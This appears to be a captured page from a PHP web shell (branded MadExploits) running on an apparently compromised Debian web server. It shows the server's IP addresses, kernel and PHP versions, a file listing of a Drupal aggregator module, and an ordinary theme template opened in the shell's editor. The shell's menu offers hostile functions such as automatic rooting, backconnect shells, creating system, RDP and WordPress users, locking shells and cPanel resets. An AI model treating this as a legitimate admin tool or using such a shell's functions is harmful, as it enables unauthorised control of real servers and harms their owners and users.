Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.140.188.174
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
aggregator /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
aggregator-feed-source.tpl.php
1.08
KB
-rw-r--r--
aggregator-item.tpl.php
1.27
KB
-rw-r--r--
aggregator-rtl.css
124
B
-rw-r--r--
aggregator-summary-item.tpl.ph...
715
B
-rw-r--r--
aggregator-summary-items.tpl.p...
652
B
-rw-r--r--
aggregator-wrapper.tpl.php
397
B
-rw-r--r--
aggregator.admin.inc
23.85
KB
-rw-r--r--
aggregator.api.php
7.21
KB
-rw-r--r--
aggregator.css
779
B
-rw-r--r--
aggregator.fetcher.inc
1.66
KB
-rw-r--r--
aggregator.info
380
B
-rw-r--r--
aggregator.install
9.64
KB
-rw-r--r--
aggregator.module
28
KB
-rw-r--r--
aggregator.pages.inc
19.4
KB
-rw-r--r--
aggregator.parser.inc
9.33
KB
-rw-r--r--
aggregator.processor.inc
7.88
KB
-rw-r--r--
aggregator.test
38.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aggregator-item.tpl.php
<?php /** * @file * Default theme implementation to format an individual feed item for display * on the aggregator page. * * Available variables: * - $feed_url: URL to the originating feed item. * - $feed_title: Title of the feed item. * - $source_url: Link to the local source section. * - $source_title: Title of the remote source. * - $source_date: Date the feed was posted on the remote source. * - $content: Feed item content. * - $categories: Linked categories assigned to the feed. * * @see template_preprocess() * @see template_preprocess_aggregator_item() * * @ingroup themeable */ ?> <div class="feed-item"> <h3 class="feed-item-title"> <a href="<?php print $feed_url; ?>"><?php print $feed_title; ?></a> </h3> <div class="feed-item-meta"> <?php if ($source_url): ?> <a href="<?php print $source_url; ?>" class="feed-item-source"><?php print $source_title; ?></a> - <?php endif; ?> <span class="feed-item-date"><?php print $source_date; ?></span> </div> <?php if ($content): ?> <div class="feed-item-body"> <?php print $content; ?> </div> <?php endif; ?> <?php if ($categories): ?> <div class="feed-item-categories"> <?php print t('Categories'); ?>: <?php print implode(', ', $categories); ?> </div> <?php endif ;?> </div>
Close